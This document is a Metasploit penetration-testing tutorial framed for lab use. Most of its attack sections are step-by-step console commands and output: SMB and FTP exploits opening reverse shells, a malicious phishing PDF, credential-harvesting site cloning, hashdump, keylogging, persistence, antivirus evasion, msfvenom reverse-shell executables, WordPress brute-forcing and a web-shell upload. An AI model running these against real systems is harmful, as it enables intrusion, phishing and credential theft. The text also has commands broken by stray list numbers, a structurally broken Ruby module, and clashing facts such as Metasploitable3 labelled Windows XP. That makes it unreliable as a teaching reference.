Professional Tutorial on Metasploit
Framework for Penetration Testing
Introduction
The
Metasploit Framework is a powerful, open-source penetration testing
platform developed by Rapid7, widely used by security professionals to
identify, exploit, and validate vulnerabilities in systems, networks, and
applications. With over 2,000 exploits, auxiliary modules, payloads, and
post-exploitation tools, it automates complex attack workflows, making it a
cornerstone of ethical hacking. This tutorial follows a structured roadmap to
master Metasploit, covering fundamentals, installation, usage, and advanced
techniques, with practical examples for each stage.
Aimed
at intermediate pentesters, this guide assumes basic knowledge of networking,
Linux, and cybersecurity concepts. All examples are designed for controlled lab
environments (e.g., Metasploitable2, TryHackMe, Hack The Box) to ensure ethical
and legal use. Unauthorized testing is illegal and unethical. Practice
in safe environments and always obtain explicit permission before testing real
systems.
1. Fundamentals Before Metasploit
Before
diving into Metasploit, a solid foundation in networking, Linux, and
cybersecurity is essential.
Networking Basics
- Concepts: Understand TCP/IP, UDP, ICMP, ports, and protocols
(e.g., HTTP, FTP, SMB).
- Practical: Use Nmap to scan for open services:
nmap
-sV 192.168.1.10
Output:
21/tcp open
ftp vsftpd 2.3.4
80/tcp open
http Apache httpd 2.2.8
This
identifies services exploitable by Metasploit.
Linux Basics
- Concepts: Master file system navigation (cd, ls), permissions
(chmod, chown), and processes (ps, kill).
- Practical: Make a script executable:
chmod
+x exploit.sh
This
prepares scripts for Metasploit automation.
Cybersecurity Basics
- Concepts: Learn attack vectors (e.g., buffer overflows,
misconfigurations), exploits (code to exploit vulnerabilities), and payloads
(code executed post-exploit).
- Practical: Study CVE databases (e.g., https://cve.mitre.org) to
understand vulnerabilities like MS08-067 (SMB flaw).
Visuals: For networking visuals, see TryHackMe’s “Network
Fundamentals” room or Nmap’s official site (https://nmap.org).
2. Introduction to Metasploit
What is Metasploit?
Metasploit
is a modular framework for developing, testing, and executing exploits. It
includes:
- Exploits: Code targeting specific vulnerabilities.
- Payloads: Code delivered post-exploit (e.g., shells).
- Auxiliary Modules: Tools for scanning, fuzzing, or enumeration.
- Post-Exploitation: Modules for privilege escalation, persistence, etc.
Installation
- Kali Linux: Pre-installed.
- Ubuntu/Debian:
·
sudo apt update
sudo
apt install metasploit-framework -y
- Verify:
msfconsole
-v
Output: Metasploit
Framework 6.x.x.
Starting Metasploit
Launch
the console:
msfconsole
Output:
=[ metasploit v6.3.0-dev ]
+
-- --=[ 2300 exploits - 1200 auxiliary - 400 post ]
+
-- --=[ 600 payloads - 45 encoders - 11 nops ]
msf6
>
The
banner confirms Metasploit is ready.
Visuals: See Metasploit’s GitHub
(https://github.com/rapid7/metasploit-framework) for console screenshots.
3. Metasploit Architecture
Components
- Exploits: Target vulnerabilities (e.g.,
exploit/windows/smb/ms08_067_netapi).
- Payloads: Deliver functionality (e.g., windows/meterpreter/reverse_tcp).
- Auxiliary Modules: Non-exploitative tasks (e.g.,
auxiliary/scanner/portscan/tcp).
- Encoders: Obfuscate payloads to evade antivirus.
- Post-Exploitation Modules: Manage compromised systems.
Example: An exploit (ms08_067_netapi) delivers a payload
(reverse_tcp) to open a Meterpreter session.
Visuals: Rapid7’s documentation (https://docs.metasploit.com) shows
module structure diagrams.
4. Information Gathering with Metasploit
Auxiliary Modules for Scanning
Use
auxiliary modules to identify services, versions, or vulnerabilities.
Example: Scan for open ports:
msf6
> use auxiliary/scanner/portscan/tcp
msf6
auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.10
msf6
auxiliary(scanner/portscan/tcp) > run
Output:
[+]
192.168.1.10:22 - TCP OPEN
[+]
192.168.1.10:80 - TCP OPEN
This
identifies potential attack surfaces.
Integration: Import Nmap results:
msf6
> db_nmap -sV 192.168.1.10
msf6
> services
Visuals: TryHackMe’s “Metasploit” room shows auxiliary module
outputs.
5. Exploitation Basics
Finding Exploits
Search
for relevant exploits:
msf6
> search windows/smb
Example: MS08-067 SMB Vulnerability
Target
a Windows XP SP3 machine (Metasploitable3):
- Load module:
msf6
> use exploit/windows/smb/ms08_067_netapi
- Configure:
3. msf6
exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.10
4. msf6
exploit(windows/smb/ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
5. msf6
exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.100
msf6
exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
- Exploit:
msf6
exploit(windows/smb/ms08_067_netapi) > exploit
Output:
[*]
Started reverse TCP handler on 192.168.1.100:4444
[*]
Meterpreter session 1 opened
This
opens a Meterpreter session.
Visuals: Hack The Box’s “Legacy” machine walkthroughs show MS08-067
exploitation.
6. Payloads in Depth
Types of Payloads
- Inline: Single-stage, all code in one package.
- Staged: Multi-stage, smaller initial payload fetches more
code.
- Reverse Shell: Connects back to attacker (e.g., reverse_tcp).
- Bind Shell: Listens on target (e.g., bind_tcp).
Example: Use a staged payload:
msf6
> set PAYLOAD windows/meterpreter/reverse_tcp
msf6
> show options
Configures
a Meterpreter reverse shell.
Visuals: Rapid7’s blog (https://www.rapid7.com/blog) has payload
type diagrams.
7. Meterpreter Commands (Post-Exploitation)
Meterpreter
is an advanced payload for post-exploitation.
Example
Commands:
meterpreter
> sysinfo
Output:
Computer : WINXP-VM
OS : Windows XP (5.1 Build 2600, Service
Pack 3)
- hashdump: Dump password hashes.
- webcam_snap: Capture webcam
image.
- keyscan_start: Start keylogger.
- upload /path/to/file: Upload
files.
Practical: Dump hashes:
meterpreter
> hashdump
Output:
Administrator:500:aad3b435b51404ee...:e52cac67419a9a224077...
Visuals: TryHackMe’s “Meterpreter” room shows session interactions.
8. Client-Side Exploitation
Client-side
attacks target users via malicious files or web content.
Example: Generate a malicious PDF:
- Load module:
msf6
> use exploit/windows/fileformat/adobe_pdf_embedded_exe
- Configure:
3. msf6
exploit(windows/fileformat/adobe_pdf_embedded_exe) > set FILENAME
malicious.pdf
4. msf6
exploit(windows/fileformat/adobe_pdf_embedded_exe) > set PAYLOAD
windows/meterpreter/reverse_tcp
5. msf6
exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.100
msf6
exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LPORT 4444
- Generate:
msf6
exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
Output:
[*]
PDF file generated: /root/.msf4/local/malicious.pdf
Deliver
via phishing and start a listener:
msf6
> use exploit/multi/handler
msf6
exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6
exploit(multi/handler) > set LHOST 192.168.1.100
msf6
exploit(multi/handler) > set LPORT 4444
msf6
exploit(multi/handler) > exploit
Visuals: Medium articles (search “Metasploit client-side attacks”) show PDF generation.
9. Social Engineering Toolkit with Metasploit
The
Social Engineering Toolkit (SET) integrates with Metasploit for phishing and
credential harvesting.
Example: Clone a login page:
- Launch SET:
setoolkit
- Select Social-Engineering
Attacks > Website Attack Vectors > Credential Harvester > Site
Cloner.
- Configure:
- URL to clone:
http://example.com/login.
- Attacker IP: 192.168.1.100.
- Start Metasploit listener:
5. msf6
> use exploit/multi/handler
6. msf6
> set PAYLOAD generic/custom
7. msf6
> set LHOST 192.168.1.100
msf6
> exploit
- Capture credentials when
victims log in.
Visuals: Hackers Arise (https://hackers-arise.com) has SET
walkthroughs.
10. Privilege Escalation
Elevate
privileges on a compromised system.
Example: Attempt SYSTEM access:
meterpreter
> getsystem
Output:
...got
system via technique 1.
If
unsuccessful, try:
msf6
> use post/windows/escalate/getsystem_service
msf6
post(windows/escalate/getsystem_service) > set SESSION 1
msf6
post(windows/escalate/getsystem_service) > run
Visuals: TryHackMe’s “Privilege Escalation” room shows Meterpreter
commands.
11. Post-Exploitation Modules
Manage
compromised systems for persistence, credential harvesting, or lateral
movement.
Example: Dump hashes:
msf6
> use post/windows/gather/hashdump
msf6
post(windows/gather/hashdump) > set SESSION 1
msf6
post(windows/gather/hashdump) > run
Output:
[+]
Hashes dumped to /root/.msf4/loot/...
Persistence:
msf6
> use exploit/windows/local/persistence
msf6
exploit(windows/local/persistence) > set SESSION 1
msf6
exploit(windows/local/persistence) > exploit
Visuals: Rapid7’s documentation shows post-exploitation outputs.
12. Metasploit for Web Application Testing
Target
web vulnerabilities like SQL injection or file uploads.
Example: Scan for HTTP services:
msf6
> use auxiliary/scanner/http/http_version
msf6
auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.10
msf6
auxiliary(scanner/http/http_version) > run
Output:
[+]
192.168.1.10:80 - Apache/2.2.8
For
WordPress (as requested):
msf6
> use auxiliary/scanner/http/wordpress_scanner
msf6
auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 192.168.1.10
msf6
auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /wordpress
msf6
auxiliary(scanner/http/wordpress_scanner) > run
Output:
[+]
WordPress Version: 5.0.0
[+]
Plugins: reflex-gallery (vulnerable)
Visuals: Web Security Academy
(https://portswigger.net/web-security) shows WordPress module outputs.
13. Custom Exploit Development
Write
or modify exploits in Ruby.
Example: Create a custom auxiliary module:
- Navigate to
/usr/share/metasploit-framework/modules/auxiliary/scanner/custom/.
- Create my_scanner.rb:
3. require
'msf/core'
4. class
MetasploitModule < Msf::Auxiliary
5. include Msf::Exploit::Remote::HttpClient
6. def initialize
7. super(
8. 'Name' => 'Custom HTTP Scanner',
9. 'Description' => 'A simple HTTP
version scanner',
10. 'Author' => 'Your Name',
11. 'License' => MSF_LICENSE
12. )
13. register_options([OptString.new('RHOSTS',
[true, 'Target host'])]
14. )
15. def run
16. res = send_request_raw({'uri' => '/'})
17. if res
18. print_good("Server:
#{res.headers['Server']}")
19. end
20. end
end
- Load:
msf6
> use auxiliary/scanner/custom/my_scanner
Visuals: Metasploit’s GitHub has module templates.
14. Automation with Resource Scripts
Automate
tasks with .rc files.
Example: Create scan.rc:
use
auxiliary/scanner/portscan/tcp
set
RHOSTS 192.168.1.10
run
Run:
msfconsole
-r scan.rc
Visuals: Rapid7’s blog shows .rc file examples.
15. Integrating Metasploit with Other Tools
Nmap
Import
Nmap results:
msf6
> db_nmap -sV 192.168.1.10
msf6
> services
Nessus/OpenVAS
Import
scan results:
msf6
> db_import nessus.xml
Armitage
GUI
for Metasploit:
armitage
Visuals: TryHackMe’s “Armitage” room shows GUI interfaces.
16. Real-Life Scenarios & Labs
Practice
on vulnerable machines:
- Metasploitable2: Includes exploitable services (e.g., vsftpd, Samba).
- DVWA: Web app for SQL injection, XSS.
- Windows XP SP3: Test MS08-067.
Example: Attack Metasploitable2’s vsftpd:
msf6
> use exploit/unix/ftp/vsftpd_234_backdoor
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.10
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Visuals: Hack The Box’s “Metasploitable” walkthroughs.
17. Advanced Usage
Evasion Techniques
Use
encoders to bypass antivirus:
msf6
> use encoder/x86/shikata_ga_nai
MSFvenom
Generate
standalone payloads:
msfvenom
-p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o
shell.exe
Start
listener:
msf6
> use exploit/multi/handler
msf6
exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6
exploit(multi/handler) > set LHOST 192.168.1.100
msf6
exploit(multi/handler) > set LPORT 4444
msf6
exploit(multi/handler) > exploit
Visuals: Black Hat Ethical Hacking
(https://www.blackhatethicalhacking.com) shows msfvenom outputs.
18. Practice & Certification
- CTFs: Hack The Box, TryHackMe, VulnHub.
- Labs: OSCP (Offensive Security Certified Professional)
labs.
- Resources:
- Exploit-DB
(https://www.exploit-db.com)
- Rapid7 Blog
(https://www.rapid7.com/blog)
- Web Security Academy
(https://portswigger.net/web-security)
Best Practices and Tips
- Ethics and Legality: Obtain explicit permission; test only in labs or
authorized environments.
- Database Usage: Always initialize msfdb for workspace management.
- Scope Limiting: Set RHOSTS and TARGETURI carefully.
- Evasion: Use proxies (set Proxies http:127.0.0.1:8080) with
Burp Suite.
- Integration: Combine with WPScan, Nikto, or sqlmap for web testing
(see previous tutorials).
- Common Pitfalls:
- Ensure payloads match target
OS/architecture.
- Test exploits in VMs to avoid
production risks.
- Resources:
- Official Docs:
https://docs.metasploit.com
- GitHub:
https://github.com/rapid7/metasploit-framework
- TryHackMe: “Metasploit” and
“Web Scanning” rooms
- Hack The Box: “Legacy” and
“Metasploitable” machines
Practical Example: Testing a WordPress Site
This
example tests a WordPress site on Metasploitable3 (192.168.1.10) with the
Reflex Gallery plugin (CVE-2015-4133).
Step 1: Reconnaissance
- Scan for WordPress details:
2. msf6
> use auxiliary/scanner/http/wordpress_scanner
3. msf6
auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 192.168.1.10
4. msf6
auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /wordpress
msf6
auxiliary(scanner/http/wordpress_scanner) > run
Output:
[+]
WordPress Version: 5.0.0
[+]
Plugins: reflex-gallery (vulnerable), akismet
Step 2: Brute-Force Credentials
- Enumerate users:
2. msf6
> use auxiliary/scanner/http/wordpress_login_enum
3. msf6
auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.10
4. msf6
auxiliary(scanner/http/wordpress_login_enum) > set TARGETURI /wordpress
5. msf6
auxiliary(scanner/http/wordpress_login_enum) > set USER_FILE
/usr/share/wordlists/rockyou.txt
6. msf6
auxiliary(scanner/http/wordpress_login_enum) > set PASS_FILE
/usr/share/wordlists/rockyou.txt
msf6
auxiliary(scanner/http/wordpress_login_enum) > run
Output:
[+]
Valid Login: admin:password123
Step 3: Exploit Reflex Gallery
- Load exploit:
msf6
> use exploit/unix/webapp/wp_reflexgallery_file_upload
- Configure:
3. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10
4. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI
/wordpress/wp-admin/
5. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin
6. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123
7. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD
cmd/unix/reverse_python
8. msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100
msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444
- Exploit:
msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
Output:
[*]
Started reverse TCP handler on 192.168.1.100:4444
[+]
Uploaded shell: /wordpress/wp-content/uploads/shell.php
[*]
Meterpreter session 1 opened
Step 4: Post-Exploitation
meterpreter
> sysinfo
meterpreter
> upload /root/malicious.txt /var/www/html/
meterpreter
> shell
Output:
whoami
www-data
Visuals: Web Security Academy’s WordPress labs show similar
exploits.
Conclusion
The
Metasploit Framework is a cornerstone of penetration testing, offering
unparalleled automation and flexibility. By following this roadmap—from
fundamentals to advanced exploitation—you can master Metasploit for real-world
scenarios. Practice ethically in lab environments like TryHackMe, Hack The Box,
or Web Security Academy to build skills and strengthen defenses.
Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.metasploit.com